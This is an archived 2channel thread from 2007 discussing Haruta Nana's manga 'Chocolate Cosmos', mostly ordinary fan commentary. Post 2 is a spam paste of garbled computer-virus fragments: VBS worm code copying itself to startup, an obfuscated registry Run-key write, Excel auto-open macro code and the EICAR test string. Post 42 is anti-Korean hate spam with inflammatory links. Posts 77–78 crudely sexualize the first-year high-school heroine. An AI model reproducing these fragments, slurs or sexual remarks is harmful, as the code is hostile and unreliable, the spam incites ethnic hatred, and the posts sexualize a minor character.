2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【チョコス】○●○春田なな☆11○●○【ラブベリ】

1 :花と名無しさん:2007/10/02(火) 04:32:55 ID:T2mDPMXG0
前スレ(DAT落ち済)
 ●●●●●●●春田なな☆10●●●●●●●
 http://anime2.2ch.net/test/read.cgi/gcomic/1151169853/

2 :花と名無しさん:2007/10/02(火) 06:37:06 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


3 :花と名無しさん:2007/10/02(火) 09:07:03 ID:8CM5w5Ek0
前作のラブベリは何か講談社漫画大賞逃したそうだけど
現のチョコスがはぴクロを蹴散らして小学館漫画大賞狙いそうな予感?

4 :花と名無しさん:2007/10/02(火) 12:08:31 ID:???0
今んとこそんな予感は全く無いが……
あのテの漫画賞は、要は出版社の「売れてくれてありがとう」「話題になってくれてありがとう」賞なので、
チョコスが売れに売れてりぼんも100万部回復!なんてことになったら受賞するかもね。

5 :花と名無しさん:2007/10/02(火) 15:46:57 ID:???O
漫画大賞(笑)

6 :花と名無しさん:2007/10/02(火) 16:55:29 ID:???O
1乙

7 :花と名無しさん:2007/10/02(火) 19:19:54 ID:???0
あんな沢尻みたいな主人公じゃ無理だろ・・・

8 :花と名無しさん:2007/10/03(水) 18:23:49 ID:???O
新連載いいね
先生かっこいいしあるあるあるwwってのがよくあるし全体的にポップだし
サボテンも好きだったけどこれもすごく好きだわ

9 :花と名無しさん:2007/10/05(金) 14:00:16 ID:PK8i9PdGO
なにこのリア丸出しぽいスレタイは
>>1



今月、またトーンベタ間に合わなかったような
真っ白なコマがあったね

ひとことで友人の結婚パーティーによばれましたと言い訳してた

10 :花と名無しさん:2007/10/05(金) 18:07:05 ID:???O
確かに今月真っ白なコマがあった。不自然なくらい白いwww
チョコス結構面白いよ。春田がんがれ

11 :花と名無しさん:2007/10/05(金) 18:20:41 ID:L2Yc3WWiO
>>7
沢尻吹いたw

12 :花と名無しさん:2007/10/06(土) 00:00:51 ID:???O
紗雪「別に」

13 :花と名無しさん:2007/10/06(土) 00:18:57 ID:???0
>>12
言いそうwww

14 :花と名無しさん:2007/10/06(土) 11:41:01 ID:c6Wi+l4B0
>>11やっぱ主人公役は沢尻エリカしか他ないんじゃまいか?

>>12それ実は名古屋嬢がよく使ってるセリフだよ

15 :花と名無しさん:2007/10/06(土) 14:24:16 ID:???0
やめてくれ
ただ感情表現が下手で誤解されてるだけの紗雪と
中身まで腐ってる糞沢尻なんぞを一緒にするな

16 :花と名無しさん:2007/10/06(土) 20:54:41 ID:???O
サユキはツンしても全然萌えないどころかかわいくなさ過ぎ

17 :花と名無しさん:2007/10/06(土) 21:52:45 ID:???O
少女漫画に萌えなんていらないだろ・・・

18 :花と名無しさん:2007/10/07(日) 01:48:25 ID:mDMhP0OIO
藤きゅん萌えですが何か

19 :花と名無しさん:2007/10/07(日) 03:00:53 ID:???0
つーか春田は、沢尻のあの性格は超絶美人だけに許されるのであって
春田みたいなブサイコがやったらただの性格醜悪ブスというだけだということに
気づいた方がいいな

20 :花と名無しさん:2007/10/07(日) 03:39:22 ID:???0
この人作者と主人公を混同してますぅ;^^
イタいですぅ;^^

21 :花と名無しさん:2007/10/07(日) 03:54:40 ID:???O
わたしもわたしも藤きゅん萌え
先生もかなりいいし渚も好きだったけどやっぱ藤きゅんが一番

22 :花と名無しさん:2007/10/07(日) 11:40:24 ID:J1QpK3fI0
チョコスの作者であるちゃまと主人公の沙雪を混同してる?どころか…
この連載作品自体がヤラれてるね

23 :花と名無しさん:2007/10/09(火) 17:06:56 ID:???O
ほしゅあげ

24 :花と名無しさん:2007/10/09(火) 22:11:30 ID:???0
目の下の線をわざとガサガサに描くのは見た目キモいのでやめた方がいい。
ゆうしってヤツの目の下色々気持ちわるいんで。

25 :花と名無しさん:2007/10/10(水) 19:47:16 ID:???O
あと、口の中にもトーン貼るようになったみたいだけど
ちゃまの絵柄じゃ似合わないからやめたほうがいいと思う。
白さをなくすため?

26 :花と名無しさん:2007/10/12(金) 02:52:06 ID:???O
>>19
春田なな可愛くないの?

27 :花と名無しさん:2007/10/12(金) 21:00:15 ID:???0
春たまは大塚愛に似ている

28 :花と名無しさん:2007/10/14(日) 11:29:22 ID:7A5d0Y/O0
いやちゃまは正直上沼恵美子に似ている
ていうかちゃまスレ暇っけだね

29 :花と名無しさん:2007/10/15(月) 23:33:27 ID:???O
紗雪かわいい

30 :花と名無しさん:2007/10/16(火) 22:30:18 ID:DhmxEGkj0
沙雪はウルマニのニナにクリソツ
特に髪型が…

31 :花と名無しさん:2007/10/17(水) 08:12:44 ID:???O
このスレ伸びないね…春田には固定ファンいないのか

32 :花と名無しさん:2007/10/17(水) 20:59:46 ID:???O
いるよ!

33 :花と名無しさん:2007/10/18(木) 02:31:36 ID:???0
ファンってほどじゃないけど……今のりぼんの連載陣の中じゃ一番マシ、くらいには思っているよ

34 :花と名無しさん:2007/10/18(木) 03:55:31 ID:pEvQ1vzk0
>>33正直に思うとりぼんの連載陣で一番マシな漫画家はYQN(槙)とムラタソであると評してみる

35 :花と名無しさん:2007/10/18(木) 04:52:48 ID:???O
ラブベリは微妙だったがチョコスは面白いと思う。

36 :花と名無しさん:2007/10/18(木) 11:22:15 ID:???0
あえていうならキャラにもう一捻り欲しいところ。
本を読む友人のキャラ立ちはいいのだが、もう一人は
よくいる軽い子なのでヒロインとの違いがなさすぎる。
男はみんな似たような顔と髪型だからもっと中味で区別して欲しいな。

37 :花と名無しさん:2007/10/18(木) 18:09:42 ID:6g3FdjqlO
チョコスからファンになった!萩原先生もろタイプでやばす^ω^
これからも頑張ってほしい

38 :花と名無しさん:2007/10/19(金) 23:20:20 ID:???0
最近のりぼんにはあのての髪型ヒロインいなかったから新鮮だね。

39 :花と名無しさん:2007/10/20(土) 00:00:12 ID:rWzsrRVE0
荻原先生は「GALS!」で例えると乙幡みたいな性格かもしれまい。
なんせウルマニのニナにクリソツな沙雪が恋しがってる相手だしね

40 :花と名無しさん:2007/10/20(土) 00:18:20 ID:???0
↑???
意味が分かりませんが。

41 :花と名無しさん:2007/10/20(土) 03:30:30 ID:???0
いつもの人だよ
本誌スレにも来てた
幼いのか日本語能力がアレなのかは不明

42 :花と名無しさん:2007/10/20(土) 11:41:10 ID:???O
韓国人が大喜び!!『地震で日本人が、たくさん死ねば良い』
http://www.enjoykorea.jp/tbbs/read.php?board_id=teconomy&page=5&nid=2849898
衝撃!!日本輸出向け、キムチに、タン唾を入れる韓国人のババア
http://plaza.rakuten.co.jp/img/user/51/17/385117/22.jpg
朴一「韓国人犯罪者を日本人名で報道すべき」
悪人を日本人にしたがる韓国人
http://www.youtube.com/watch?v=QLXTk7IG0dg 韓国旅行中にレイプされた日本人
http://tour2korea.k-free.net
http://tour2korea.k-free.net/rapetaiken.html

43 :花と名無しさん:2007/10/20(土) 21:21:32 ID:???O
春田もりぼスペで新作読み切り描いてほしかったよ。読み切り読みたいなー

44 :花と名無しさん:2007/10/21(日) 20:32:18 ID:???0
著しい絵の変化だな。
えみかみたいなヒロインが主人公でも良かったのに。

45 :花と名無しさん:2007/10/23(火) 00:56:23 ID:???0
>>43
いや、中身うっすいクリスマス漫画の記憶があるので(ですます言葉の
キンパツくんが出てくる奴)読み切りはいいから連載に集中してほしい

46 :花と名無しさん:2007/10/23(火) 01:04:41 ID:???0
そうそ、ちゃまは槙やモッチーのように一度に多くを出来る器ではない。

47 :花と名無しさん:2007/10/24(水) 06:58:37 ID:???O
>>44
元の絵と基本は変わらずただ目を小さくしただけにしか見えないけど
吉住さんの絵のパクリとか言われてたな

ところで何故野球部にしたんだろうw
野球部で何かやりたい展開でもあるのだろうか

48 :花と名無しさん:2007/10/25(木) 09:14:22 ID:???0
この人にキャラ漫画は描けないと思う、個性弱すぎる。
だからまともにストーリーで勝負してくれないと。
野球って女の子とっつきにくいジャンルだな・・・まだバスケかサッカーの方がルール分かりやすいものを。
惹きつける自信があるんだろうかね。

49 :花と名無しさん:2007/10/25(木) 13:01:49 ID:???0
>>48
別にこっから本格野球漫画になるわけじゃないだろうし、いいんじゃない?
要は主要キャラがクラス以外でくっついたり離れたりする空間でさえあれば何でもいいわけで

50 :花と名無しさん:2007/10/27(土) 19:25:43 ID:???0
遅いけど11月号読んだ。今回の、終わり付近やたら白いね。
前半に比べて髪のトーンもぜんぜん貼られてないし。
ギリギリだったのかな。


51 :花と名無しさん:2007/10/27(土) 21:41:43 ID:???O
仕様じゃない?

52 :花と名無しさん:2007/11/02(金) 12:24:25 ID:???0
今月どうよ

53 :花と名無しさん:2007/11/02(金) 12:25:11 ID:???0
まずはそっちが感想書いたらどうよ

54 :花と名無しさん:2007/11/02(金) 23:27:52 ID:???O
自分は良かったよ
今月は(も?)さくっと読めるコメディ調で

55 :花と名無しさん:2007/11/02(金) 23:39:47 ID:???0
面白かったよ普通に。いいキャラができたと思う。

56 :花と名無しさん:2007/11/03(土) 19:37:40 ID:???0
相変わらず過疎地wwwwwww

57 :花と名無しさん:2007/11/03(土) 20:27:14 ID:???0
普通に面白いと思う
長期連載確実だな

58 :花と名無しさん:2007/11/03(土) 22:39:57 ID:???0
それは君の願望だな。
しかし今は他に争える連載もないし、そうなるだろうけどね。

59 :花と名無しさん:2007/11/05(月) 05:38:09 ID:???O
紗雪かわいいよ紗雪

60 :花と名無しさん:2007/11/07(水) 06:10:05 ID:???O
この漫画嫌だ。
こんなちょっと若いカッコいいひいき目の先生が人気だから
生徒思いの年配の先生がキモいとかウザいとかいわれんじゃん
軽すぎ

61 :花と名無しさん:2007/11/07(水) 06:50:03 ID:???0
>>60
それはあなたが女子の体に触ったり胸ばかり見てるからですよ、先生

62 :花と名無しさん:2007/11/07(水) 14:29:17 ID:???O
いい先生に出会えなかったんだね
可哀想…

63 :花と名無しさん:2007/11/07(水) 17:28:28 ID:???O
可愛いし最高の萌えキャラだったな>笑佳

64 :花と名無しさん:2007/11/07(水) 20:01:45 ID:???O
だってロリ顔ツインテールだもの

65 :花と名無しさん:2007/11/14(水) 22:30:09 ID:???0
ところでどの辺でチョコレートコスモスが本編に登場するのだろう。

66 :花と名無しさん:2007/11/16(金) 16:08:07 ID:???0
園芸部にしとけばよか(ry

67 :花と名無しさん:2007/11/17(土) 11:27:08 ID:???O
一話で先生がチョコバナナ売ってたじゃん

68 :花と名無しさん:2007/11/17(土) 12:53:55 ID:DH1cRnslO
藤きゅんを超える萌えキャラなどいない

69 :花と名無しさん:2007/11/17(土) 13:16:00 ID:???0
初回のあおりが「一番せつないラブストーリー」みたいなやつだったけど
本編見る限りではラブコメにしか見えない。途中から変わるのか?

70 :花と名無しさん:2007/11/17(土) 14:39:27 ID:???0
>>69
ソレ思った。
自分はそのコメさえ笑えないのだが。

71 :花と名無しさん:2007/11/19(月) 01:07:28 ID:???0
さっさと打ち切ってくれないかな>チョコス
どうにもつまらなす

72 :花と名無しさん:2007/11/19(月) 04:26:26 ID:???O
これから切ない展開になっていくのだろうか。りぼんスレで出てたけどチョコレートコスモスの花言葉は恋の終わり らしい。失恋漫画になるのかな?そういう展開少ないから読んでみたいかも

73 :花と名無しさん:2007/11/19(月) 06:13:19 ID:???0
でも先生に失恋して悠士とくっつくんじゃつまらんな
ちゃんと最後は先生とくっついてほしい

74 :花と名無しさん:2007/11/19(月) 12:56:49 ID:???0
くっつくのは社会人になってからの方がいいな、個人的には。
三角関係は好きだけど、ヒロインがどっちつかずになったりしないか心配だ。
1話のヒロインの態度見てると、イケメンなら誰でもいいんか?と思ってしまった。
あれはさすがにペットボトルぶつけられた彼の方に同情したよ・・・
今の時点では惹かれてるって感じだけど、もっと先生以外は駄目だみたいな「好き」にならんと
設定上説得力なくなると思う。世間的には禁断の恋に当てはまるわけだし。
ドロドロにはなってほしくないけど。

75 :花と名無しさん:2007/11/21(水) 06:57:00 ID:???O
>>60
現実を描いてるだけじゃないか

76 :花と名無しさん:2007/11/21(水) 10:48:20 ID:???0
紗雪を性格悪いとのたまっている批評も見受けるけど、歴代ヒロインに比べるとまともに見える。
ただ、今月の「不純な動機」については、香住先生の言うとおりだと思うけど。
不純な動機で何が悪い!って開き直っても良かったかな。


77 :花と名無しさん:2007/11/21(水) 14:02:03 ID:???0
>>74
いやいかん!
男なら女子高生、それもできるなら高校一年生のぴちぴちな内に紗雪たんの肢体をいただいちゃいたいはずだ!
先生もきっとそのはずだ!

78 :花と名無しさん:2007/11/21(水) 20:21:28 ID:???0
202 :花と名無しさん:2007/08/06(月) 16:28:29 ID:???0
天ぷらのごく一部だけ借りますよ
【チョコス】萩原先生の肉バナナはチョコじゃなくてイカの匂いだよ(´∀`)
      たしかにまだ紗雪のキャラ掴めてない感は否めないけど、まだ連載始まったばかりだし、そこは大目に見ていいんじゃないかなー。
      それより、せっかく連載初回から水着回なんだから、もっと紗雪たんの成長途上ボディをじっくり見せてよ!舐め回すようなアングルで!
      すぐにパーカー羽織らせちゃダメダメ!
【おさんぽ】体の線のなまめかしさ、みたいなのはやはり飛び抜けてる。さすがだなー。
      まぁそれくらいしか褒めるとこ無いわけだが……
      夏なんだし、一度はプールとか海とか水着回をやってほしい
      あと、こないだ出たないしょのつぼみの短編みたいにきなこと康太郎がぶつかって中身入れ替わるとか……
【木々】  あんなオリエンテーリングの設営みたいな事やってっから死期早まったんじゃねーの?
      いくら可愛いいえばんキャラでも、死んだ娘にはハァハァしづらい。なんか屍姦みたいで。

↑の人でつか?

79 :花と名無しさん:2007/11/23(金) 22:32:54 ID:???O
はぎっちょの年齢はいくつ?
番外編読んだところさゆとは9歳差?

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)